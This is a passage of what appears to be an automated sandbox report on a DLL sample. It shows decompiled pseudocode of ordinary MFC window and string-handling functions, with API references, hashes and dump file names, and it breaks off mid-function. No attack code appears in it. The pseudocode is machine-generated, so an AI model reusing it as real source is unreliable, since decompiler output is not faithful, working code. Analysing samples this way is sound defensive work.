VariantClear.OLEAUT32(?), ref: 1001A289
VariantClear.OLEAUT32(?), ref: 1001A47A

Part of subcall function 1001BDD4: VariantCopy.OLEAUT32(?,?), ref: 1001BDE2

Part of subcall function 1000563B: __EH_prolog3.LIBCMT ref: 10005642

Part of subcall function 1001C08A: __EH_prolog3.LIBCMT ref: 1001C094
Part of subcall function 1001C08A: lstrlenA.KERNEL32(?,00000224,1001A446,?,00000008,00000000,?,000000CC), ref: 1001C0B3
Part of subcall function 1001C08A: SysAllocStringByteLen.OLEAUT32(?,00000000), ref: 1001C0BB

Memory Dump Source

Source File: 00000003.00000002.256826157.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.256820228.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256858129.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256868016.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256885461.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256890423.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256915965.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256923661.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256927715.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256970454.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Variant$ClearH_prolog3$AllocByteCopyException@8StringThrowlstrlen
String ID:
API String ID: 1021156189-0
Opcode ID: 11928700629b18b402dda85779f21ecb76941389bd754c7d3cf7010b2ddea385
Instruction ID: 4e7b89f9de4aa6b433371361e179044e480e3473b7358c3f62ac7a10d9bffcd1
Opcode Fuzzy Hash: 11928700629b18b402dda85779f21ecb76941389bd754c7d3cf7010b2ddea385
Instruction Fuzzy Hash: B3F1587480014CEADF55DFA4C880AED7BB9FF09344F50805AF8559B292EB74EAC8DB61

Uniqueness

Uniqueness Score: -1.00%

Function 1001D5EB Relevance: 9.1, APIs: 6, Instructions: 118
memoryCOMMON

Download Yara Rule

C-Code - Quality: 42%

			E1001D5EB(void* __edx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t42;
				void* _t46;
				void* _t47;
				void* _t52;
				intOrPtr _t66;
				intOrPtr _t74;
				void* _t76;
				void* _t96;
				void* _t97;
				intOrPtr* _t98;
				void* _t99;
				short* _t101;
				void* _t102;
				signed int _t103;
				void* _t105;

				_t96 = __edx;
				_t103 = _t105 - 0x8c;
				_t42 =  *0x10045580; // 0x2ef01728
				 *(_t103 + 0x88) = _t42 ^ _t103;
				_t74 =  *((intOrPtr*)(_t103 + 0x98));
				_t101 =  *((intOrPtr*)(_t103 + 0x94));
				_push(_t97);
				E10020F40(_t97, _t101, 0, 0x20);
				 *((intOrPtr*)(_t103 - 0x80)) = _t103 - 0x78;
				_t46 = E1001056A(_t74, 0x10038ea0);
				_t98 = __imp__#2;
				if(_t46 == 0) {
					_t78 = _t74;
					_t47 = E1001056A(_t74, 0x10036ce4);
					__eflags = _t47;
					_push(0x100);
					_push(_t103 - 0x78);
					if(_t47 == 0) {
						_push(0xf108);
						E100103ED(_t74, _t78, _t98, _t101, _t103);
						 *_t101 = 0xf108;
					} else {
						_push(0xf10a);
						E100103ED(_t74, _t78, _t98, _t101, _t103);
						 *_t101 = 0xf10a;
					}
				} else {
					 *((intOrPtr*)(_t103 - 0x80)) =  *((intOrPtr*)(_t74 + 0xc));
					 *_t101 =  *((intOrPtr*)(_t74 + 8));
					 *((intOrPtr*)(_t101 + 0x10)) =  *((intOrPtr*)(_t74 + 0x10));
					 *((intOrPtr*)(_t101 + 0x1c)) =  *((intOrPtr*)(_t74 + 0x1c));
					_t66 =  *((intOrPtr*)(_t74 + 0x14));
					_t111 =  *((intOrPtr*)(_t66 - 0xc));
					if( *((intOrPtr*)(_t66 - 0xc)) != 0) {
						 *((intOrPtr*)(_t101 + 0xc)) =  *_t98( *((intOrPtr*)(E1000567F(_t74, _t103 - 0x7c, _t98, _t101, _t111))), _t66);
						E10001260( *((intOrPtr*)(_t103 - 0x7c)) + 0xfffffff0, _t96);
					}
					_t74 =  *((intOrPtr*)(_t74 + 0x18));
					_t113 =  *((intOrPtr*)(_t74 - 0xc));
					if( *((intOrPtr*)(_t74 - 0xc)) != 0) {
						 *((intOrPtr*)(_t101 + 4)) =  *_t98( *((intOrPtr*)(E1000567F(_t74, _t103 - 0x7c, _t98, _t101, _t113))), _t74);
						E10001260( *((intOrPtr*)(_t103 - 0x7c)) + 0xfffffff0, _t96);
					}
				}
				 *((intOrPtr*)(_t101 + 8)) =  *_t98( *((intOrPtr*)(E1000567F(_t74, _t103 - 0x7c, _t98, _t101, _t113))),  *((intOrPtr*)(_t103 - 0x80)));
				_t52 = E10001260( *((intOrPtr*)(_t103 - 0x7c)) + 0xfffffff0, _t96);
				_t114 =  *((intOrPtr*)(_t101 + 4));
				if( *((intOrPtr*)(_t101 + 4)) == 0) {
					 *((intOrPtr*)(_t101 + 4)) =  *_t98( *((intOrPtr*)(E1000567F(0, _t103 - 0x7c, _t98, _t101, _t114))),  *((intOrPtr*)(E1000EC09(0, _t98, _t101, _t114) + 0x10)));
					_t52 = E10001260( *((intOrPtr*)(_t103 - 0x7c)) + 0xfffffff0, _t96);
				}
				if( *((intOrPtr*)(_t101 + 0xc)) == 0) {
					_t117 =  *((intOrPtr*)(_t101 + 0x10));
					if( *((intOrPtr*)(_t101 + 0x10)) != 0) {
						 *((intOrPtr*)(_t101 + 0xc)) =  *_t98( *((intOrPtr*)(E1000567F(0, _t103 - 0x7c, _t98, _t101, _t117))),  *((intOrPtr*)( *((intOrPtr*)(E1000EC09(0, _t98, _t101, _t117) + 4)) + 0x64)));
						_t52 = E10001260( *((intOrPtr*)(_t103 - 0x7c)) + 0xfffffff0, _t96);
					}
				}
				_pop(_t99);
				_pop(_t102);
				_pop(_t76);
				return E1001FBB5(_t52, _t76,  *(_t103 + 0x88) ^ _t103, _t96, _t99, _t102);
			}

APIs

_memset.LIBCMT ref: 1001D61A
SysAllocString.OLEAUT32(00000000), ref: 1001D66B
SysAllocString.OLEAUT32(00000000), ref: 1001D68F

Part of subcall function 1000567F: __EH_prolog3.LIBCMT ref: 10005686

SysAllocString.OLEAUT32(00000000), ref: 1001D6E7
SysAllocString.OLEAUT32(00000000), ref: 1001D710
SysAllocString.OLEAUT32(00000000), ref: 1001D73F

Memory Dump Source

Source File: 00000003.00000002.256826157.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.256820228.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256858129.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256868016.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256885461.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256890423.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256915965.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256923661.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256927715.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256970454.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: AllocString$H_prolog3_memset
String ID:
API String ID: 842698744-0
Opcode ID: df61c5337132f301d7380ed1605a359c448a967be7e87a7bfd6a5cb2acb23dbb
Instruction ID: 6e1135c887c9357414f922cece5f9f8fee59e25652f77c4319450727ae6b76bc
Opcode Fuzzy Hash: df61c5337132f301d7380ed1605a359c448a967be7e87a7bfd6a5cb2acb23dbb
Instruction Fuzzy Hash: 00415E34900208CFDB24EFB8D881A9EB7B1FF54354F10852EF5A69B2A6DB71A854CF54

Uniqueness

Uniqueness Score: -1.00%

Function 1000772D Relevance: 9.1, APIs: 6, Instructions: 115
threadwindowCOMMON

Download Yara Rule

C-Code - Quality: 81%

			E1000772D(void* __ecx, void* __edx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t37;
				signed int _t54;
				intOrPtr _t57;
				long _t60;
				struct HWND__* _t63;
				CHAR* _t64;
				void* _t65;
				void* _t67;
				void* _t71;
				void* _t72;
				long _t73;
				void* _t74;
				void* _t75;
				signed int _t77;
				void* _t78;
				signed int _t79;
				void* _t81;

				_t71 = __edx;
				_t79 = _t81 - 0x9c;
				_t37 =  *0x10045580; // 0x2ef01728
				 *(_t79 + 0x98) = _t37 ^ _t79;
				_t73 =  *(_t79 + 0xa4);
				_t77 = 0;
				 *((intOrPtr*)(_t79 - 0x80)) =  *((intOrPtr*)(_t79 + 0xa8));
				E1000764E(0);
				_t67 = _t72;
				_t63 = E10007682(0, _t79 - 0x70);
				 *(_t79 - 0x7c) = _t63;
				if(_t63 !=  *(_t79 - 0x70)) {
					EnableWindow(_t63, 1);
				}
				 *(_t79 - 0x78) =  *(_t79 - 0x78) & _t77;
				GetWindowThreadProcessId(_t63, _t79 - 0x78);
				if(_t63 == 0 ||  *(_t79 - 0x78) != GetCurrentProcessId()) {
					L6:
					__eflags = _t73;
					if(__eflags != 0) {
						_t77 = _t73 + 0x78;
					}
					goto L8;
				} else {
					_t60 = SendMessageA(_t63, 0x376, 0, 0);
					if(_t60 == 0) {
						goto L6;
					} else {
						_t77 = _t60;
						L8:
						 *(_t79 - 0x74) =  *(_t79 - 0x74) & 0x00000000;
						if(_t77 != 0) {
							 *(_t79 - 0x74) =  *_t77;
							_t57 =  *((intOrPtr*)(_t79 + 0xb0));
							if(_t57 != 0) {
								 *_t77 = _t57 + 0x30000;
							}
						}
						if(( *(_t79 + 0xac) & 0x000000f0) == 0) {
							_t54 =  *(_t79 + 0xac) & 0x0000000f;
							if(_t54 <= 1) {
								_t24 = _t79 + 0xac;
								 *_t24 =  *(_t79 + 0xac) | 0x00000030;
								__eflags =  *_t24;
							} else {
								if(_t54 + 0xfffffffd <= 1) {
									 *(_t79 + 0xac) =  *(_t79 + 0xac) | 0x00000020;
								}
							}
						}
						_t96 = _t73;
						 *(_t79 - 0x6c) = 0;
						if(_t73 == 0) {
							_t64 = _t79 - 0x6c;
							_t73 = 0x104;
							__eflags = GetModuleFileNameA(0, _t64, 0x104) - 0x104;
							if(__eflags == 0) {
								 *((char*)(_t79 + 0x97)) = 0;
							}
						} else {
							_t64 =  *(_t73 + 0x50);
						}
						_push( *(_t79 + 0xac));
						_push(_t64);
						_push( *((intOrPtr*)(_t79 - 0x80)));
						_push( *(_t79 - 0x7c));
						_t74 = E100075B7(_t64, _t67, _t73, _t77, _t96);
						if(_t77 != 0) {
							 *_t77 =  *(_t79 - 0x74);
						}
						if( *(_t79 - 0x70) != 0) {
							EnableWindow( *(_t79 - 0x70), 1);
						}
						E1000764E(1);
						_pop(_t75);
						_pop(_t78);
						_pop(_t65);
						return E1001FBB5(_t74, _t65,  *(_t79 + 0x98) ^ _t79, _t71, _t75, _t78);
					}
				}
			}

APIs

Part of subcall function 10007682: GetParent.USER32(?), ref: 100076D5
Part of subcall function 10007682: GetLastActivePopup.USER32(?), ref: 100076E4
Part of subcall function 10007682: IsWindowEnabled.USER32(?), ref: 100076F9
Part of subcall function 10007682: EnableWindow.USER32(?,00000000), ref: 1000770C

EnableWindow.USER32(?,00000001), ref: 1000777A
GetWindowThreadProcessId.USER32(?,?), ref: 10007788
GetCurrentProcessId.KERNEL32(?,?), ref: 10007792
SendMessageA.USER32 ref: 100077A7
GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?), ref: 10007824
EnableWindow.USER32(?,00000001), ref: 10007860

Memory Dump Source

Source File: 00000003.00000002.256826157.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.256820228.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256858129.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256868016.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256885461.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256890423.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256915965.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256923661.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256927715.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256970454.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Window$Enable$Process$ActiveCurrentEnabledFileLastMessageModuleNameParentPopupSendThread
String ID:
API String ID: 1877664794-0
Opcode ID: f2399ea1d54a9bf52ed2f5ca6e2961852035bc04a76c1f8deff7aeca07201bb6
Instruction ID: bdb92c1df6b4a8dc20cb8eb5586ece2812bcce3fef41ea9017e6a72a13aca31b
Opcode Fuzzy Hash: f2399ea1d54a9bf52ed2f5ca6e2961852035bc04a76c1f8deff7aeca07201bb6
Instruction Fuzzy Hash: DB417B32E002589FFB31CF74CC89B9D77A8FF05280F214119E95D9B286EB799944CB61

Uniqueness

Uniqueness Score: -1.00%

Function 10007682 Relevance: 9.1, APIs: 6, Instructions: 68
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10007682(struct HWND__* _a4, struct HWND__** _a8) {
				struct HWND__* _t7;
				void* _t13;
				struct HWND__** _t15;
				struct HWND__* _t16;
				struct HWND__* _t17;
				struct HWND__* _t18;

				_t18 = _a4;
				_t17 = _t18;
				if(_t18 != 0) {
					L5:
					if((GetWindowLongA(_t17, 0xfffffff0) & 0x40000000) == 0) {
						L8:
						_t16 = _t17;
						_t7 = _t17;
						if(_t17 == 0) {
							L10:
							if(_t18 == 0 && _t17 != 0) {
								_t17 = GetLastActivePopup(_t17);
							}
							_t15 = _a8;
							if(_t15 != 0) {
								if(_t16 == 0 || IsWindowEnabled(_t16) == 0 || _t16 == _t17) {
									 *_t15 =  *_t15 & 0x00000000;
								} else {
									 *_t15 = _t16;
									EnableWindow(_t16, 0);
								}
							}
							return _t17;
						} else {
							goto L9;
						}
						do {
							L9:
							_t16 = _t7;
							_t7 = GetParent(_t7);
						} while (_t7 != 0);
						goto L10;
					}
					_t17 = GetParent(_t17);
					L7:
					if(_t17 != 0) {
						goto L5;
					}
					goto L8;
				}
				_t13 = E100075AB();
				if(_t13 != 0) {
					L4:
					_t17 =  *(_t13 + 0x20);
					goto L7;
				}
				_t13 = E10005CAE();
				if(_t13 != 0) {
					goto L4;
				}
				_t17 = 0;
				goto L8;
			}

APIs

GetWindowLongA.USER32 ref: 100076B4
GetParent.USER32(?), ref: 100076C2
GetParent.USER32(?), ref: 100076D5
GetLastActivePopup.USER32(?), ref: 100076E4
IsWindowEnabled.USER32(?), ref: 100076F9
EnableWindow.USER32(?,00000000), ref: 1000770C

Memory Dump Source

Source File: 00000003.00000002.256826157.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.256820228.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256858129.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256868016.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256885461.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256890423.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256915965.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256923661.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256927715.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256970454.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Window$Parent$ActiveEnableEnabledLastLongPopup
String ID:
API String ID: 670545878-0
Opcode ID: 0495e4ef43923a245b0fe769c269373e2e029a288f2a749e2dd0ce88f3e134b5
Instruction ID: 462ae3bbbf91228899846c1fb6a9f27f843f520308df6a83637efefa3aec2235
Opcode Fuzzy Hash: 0495e4ef43923a245b0fe769c269373e2e029a288f2a749e2dd0ce88f3e134b5
Instruction Fuzzy Hash: 3411CE72E04A365BF2229A6D8C80B1B77DCFF49AE0F124115EC0EE7219DB6ACC0046F5

Uniqueness

Uniqueness Score: -1.00%

Function 10011181 Relevance: 9.0, APIs: 6, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E10011181(struct HWND__* _a4, struct tagPOINT _a8, intOrPtr _a12) {
				struct tagRECT _v20;
				struct HWND__* _t12;
				struct HWND__* _t21;

				ClientToScreen(_a4,  &_a8);
				_t12 = GetWindow(_a4, 5);
				while(1) {
					_t21 = _t12;
					if(_t21 == 0) {
						break;
					}
					if(GetDlgCtrlID(_t21) != 0 && (GetWindowLongA(_t21, 0xfffffff0) & 0x10000000) != 0) {
						GetWindowRect(_t21,  &_v20);
						_push(_a12);
						if(PtInRect( &_v20, _a8) != 0) {
							return _t21;
						}
					}
					_t12 = GetWindow(_t21, 2);
				}
				return _t12;
			}

0x10011190
0x100111e1
0x100111e1
0x100111e3
0x100111e7
0x00000000
0x00000000
0x100111ad
0x100111c4
0x100111ca
0x100111dc
0x00000000
0x100111ef
0x100111dc
0x100111e1
0x100111e1
0x100111ec

APIs

ClientToScreen.USER32(?,?), ref: 10011190
GetDlgCtrlID.USER32 ref: 100111A4
GetWindowLongA.USER32 ref: 100111B2
GetWindowRect.USER32 ref: 100111C4
PtInRect.USER32(?,?,?), ref: 100111D4
GetWindow.USER32(?,00000005), ref: 100111E1

Memory Dump Source

Source File: 00000003.00000002.256826157.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.256820228.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256858129.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256868016.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256885461.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256890423.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256915965.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256923661.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256927715.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256970454.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Window$Rect$ClientCtrlLongScreen
String ID:
API String ID: 1315500227-0
Opcode ID: 0bb2bf6e42f8f06f434990d85aaec66e0fa50538ae204af0560bac11247d4450
Instruction ID: 0af4e894630c16eeb035fae8976970eddf4787ec4e71c720814606927fab57bb
Opcode Fuzzy Hash: 0bb2bf6e42f8f06f434990d85aaec66e0fa50538ae204af0560bac11247d4450
Instruction Fuzzy Hash: 05014B36A0112ABBEB129F958C48EDE7BACEF49791F008014FE11AE061D730DB458BA4

Uniqueness

Uniqueness Score: -1.00%

Function 1000D1F4 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 234
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E1000D1F4(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags, signed int _a4) {
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				char* _v20;
				signed int _v28;
				intOrPtr _v32;
				intOrPtr _v40;
				intOrPtr _v52;
				signed int _v56;
				void* __ebp;
				intOrPtr _t122;
				void* _t128;
				intOrPtr _t130;
				signed int _t139;
				signed int _t144;
				signed int _t175;
				signed int _t177;
				signed int _t179;
				signed int _t181;
				signed int _t183;
				signed int _t187;
				void* _t190;
				intOrPtr _t191;
				signed int _t201;

				_t190 = __ecx;
				_t122 = E1000EC09(__ebx, __edi, __esi, __eflags);
				_v8 = _t122;
				_t3 =  &_a4;
				 *_t3 = _a4 &  !( *(_t122 + 0x18));
				if( *_t3 == 0) {
					return 1;
				}
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t201 = 0;
				E10020F40(0,  &_v56, 0, 0x28);
				_v52 = DefWindowProcA;
				_t128 = E1000EC09(__ebx, 0, 0, __eflags);
				__eflags = _a4 & 0x00000001;
				_v40 =  *((intOrPtr*)(_t128 + 8));
				_t130 =  *0x10048658; // 0x10003
				_t187 = 8;
				_v32 = _t130;
				_v16 = _t187;
				if(__eflags != 0) {
					_push( &_v56);
					_v56 = 0xb;
					_v20 = "AfxWnd80s";
					_t183 = E1000D010(_t187, _t190, 0, 0, __eflags);
					__eflags = _t183;
					if(_t183 != 0) {
						_t201 = 1;
						__eflags = 1;
					}
				}
				__eflags = _a4 & 0x00000020;
				if(__eflags != 0) {
					_v56 = _v56 | 0x0000008b;
					_push( &_v56);
					_v20 = "AfxOleControl80s";
					_t181 = E1000D010(_t187, _t190, 0, _t201, __eflags);
					__eflags = _t181;
					if(_t181 != 0) {
						_t201 = _t201 | 0x00000020;
						__eflags = _t201;
					}
				}
				__eflags = _a4 & 0x00000002;
				if(__eflags != 0) {
					_push( &_v56);
					_v56 = 0;
					_v20 = "AfxControlBar80s";
					_v28 = 0x10;
					_t179 = E1000D010(_t187, _t190, 0, _t201, __eflags);
					__eflags = _t179;
					if(_t179 != 0) {
						_t201 = _t201 | 0x00000002;
						__eflags = _t201;
					}
				}
				__eflags = _a4 & 0x00000004;
				if(__eflags != 0) {
					_v56 = _t187;
					_v28 = 0;
					_t177 = E1000D1B3(_t190, __eflags,  &_v56, "AfxMDIFrame80s", 0x7a01);
					__eflags = _t177;
					if(_t177 != 0) {
						_t201 = _t201 | 0x00000004;
						__eflags = _t201;
					}
				}
				__eflags = _a4 & _t187;
				if(__eflags != 0) {
					_v56 = 0xb;
					_v28 = 6;
					_t175 = E1000D1B3(_t190, __eflags,  &_v56, "AfxFrameOrView80s", 0x7a02);
					__eflags = _t175;
					if(_t175 != 0) {
						_t201 = _t201 | _t187;
						__eflags = _t201;
					}
				}
				__eflags = _a4 & 0x00000010;
				if(__eflags != 0) {
					_v12 = 0xff;
					_t201 = _t201 | E1000AE1B(_t187, _t190, _t201, __eflags,  &_v16, 0x3fc0);
					_t48 =  &_a4;
					 *_t48 = _a4 & 0xffffc03f;
					__eflags =  *_t48;
				}
				__eflags = _a4 & 0x00000040;
				if(__eflags != 0) {
					_v12 = 0x10;
					_t201 = _t201 | E1000AE1B(_t187, _t190, _t201, __eflags,  &_v16, 0x40);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00000080;
				if(__eflags != 0) {
					_v12 = 2;
					_t201 = _t201 | E1000AE1B(_t187, _t190, _t201, __eflags,  &_v16, 0x80);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00000100;
				if(__eflags != 0) {
					_v12 = _t187;
					_t201 = _t201 | E1000AE1B(_t187, _t190, _t201, __eflags,  &_v16, 0x100);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00000200;
				if(__eflags != 0) {
					_v12 = 0x20;
					_t201 = _t201 | E1000AE1B(_t187, _t190, _t201, __eflags,  &_v16, 0x200);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00000400;
				if(__eflags != 0) {
					_v12 = 1;
					_t201 = _t201 | E1000AE1B(0x400, _t190, _t201, __eflags,  &_v16, 0x400);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00000800;
				if(__eflags != 0) {
					_v12 = 0x40;
					_t201 = _t201 | E1000AE1B(0x400, _t190, _t201, __eflags,  &_v16, 0x800);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00001000;
				if(__eflags != 0) {
					_v12 = 4;
					_t201 = _t201 | E1000AE1B(0x400, _t190, _t201, __eflags,  &_v16, 0x1000);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00002000;
				if(__eflags != 0) {
					_v12 = 0x80;
					_t201 = _t201 | E1000AE1B(0x400, _t190, _t201, __eflags,  &_v16, 0x2000);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00004000;
				if(__eflags != 0) {
					_v12 = 0x800;
					_t201 = _t201 | E1000AE1B(0x400, _t190, _t201, __eflags,  &_v16, 0x4000);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00008000;
				if(__eflags != 0) {
					_v12 = 0x400;
					_t201 = _t201 | E1000AE1B(0x400, _t190, _t201, __eflags,  &_v16, 0x8000);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00010000;
				if(__eflags != 0) {
					_v12 = 0x200;
					_t201 = _t201 | E1000AE1B(0x400, _t190, _t201, __eflags,  &_v16, 0x10000);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00020000;
				if(__eflags != 0) {
					_v12 = 0x100;
					_t201 = _t201 | E1000AE1B(0x400, _t190, _t201, __eflags,  &_v16, 0x20000);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00040000;
				if(__eflags != 0) {
					_v12 = 0x8000;
					_t201 = _t201 | E1000AE1B(0x400, _t190, _t201, __eflags,  &_v16, 0x40000);
					__eflags = _t201;
				}
				_t191 = _v8;
				 *(_t191 + 0x18) =  *(_t191 + 0x18) | _t201;
				_t139 =  *(_t191 + 0x18);
				__eflags = (_t139 & 0x00003fc0) - 0x3fc0;
				if((_t139 & 0x00003fc0) == 0x3fc0) {
					 *(_t191 + 0x18) = _t139 | 0x00000010;
					_t201 = _t201 | 0x00000010;
					__eflags = _t201;
				}
				asm("sbb eax, eax");
				_t144 =  ~((_t201 & _a4) - _a4) + 1;
				__eflags = _t144;
				return _t144;
			}

APIs

_memset.LIBCMT ref: 1000D222

Strings

AfxFrameOrView80s, xrefs: 1000D2E8
@, xrefs: 1000D3C7
@, xrefs: 1000D32E
AfxMDIFrame80s, xrefs: 1000D2C3

Memory Dump Source

Source File: 00000003.00000002.256826157.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.256820228.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256858129.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256868016.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256885461.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256890423.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256915965.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256923661.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256927715.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256970454.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: _memset
String ID: @$@$AfxFrameOrView80s$AfxMDIFrame80s
API String ID: 2102423945-4122032997
Opcode ID: c168e17b045a5f8c37e10149647611635915d659673ffe8c7442d4f1077db2e7
Instruction ID: 8836cd366f4edbb263e832dd9095b9ce1b533ce8c5134698fb64192b8290e0ae
Opcode Fuzzy Hash: c168e17b045a5f8c37e10149647611635915d659673ffe8c7442d4f1077db2e7
Instruction Fuzzy Hash: 7C8130B5C00259AAFB51DFE4C585BDEBBF8EF043C4F118166F908E6185E7749A84CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 100121BA Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 126
stringCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E100121BA(void* __ebx, void** __ecx, void* __edx, void* __esi, char* _a4, short _a8) {
				signed int _v8;
				short _v72;
				char* _v76;
				signed int _v80;
				signed int* _v84;
				signed int _v88;
				intOrPtr _v92;
				void* __edi;
				void* __ebp;
				signed int _t54;
				void* _t66;
				short* _t70;
				signed int _t72;
				signed int _t81;
				signed int* _t83;
				short* _t84;
				void* _t91;
				signed int* _t98;
				signed int _t99;
				void** _t100;
				intOrPtr _t102;
				signed int _t104;
				signed int _t106;
				void* _t107;

				_t101 = __esi;
				_t97 = __edx;
				_t82 = __ebx;
				_t54 =  *0x10045580; // 0x2ef01728
				_v8 = _t54 ^ _t106;
				_t100 = __ecx;
				_v76 = _a4;
				if(__ecx[1] != 0) {
					_push(__ebx);
					_push(__esi);
					_t83 = GlobalLock( *__ecx);
					_v84 = _t83;
					_v88 = 0 | _t83[0] == 0x0000ffff;
					_v80 = E10011FFD(_t83);
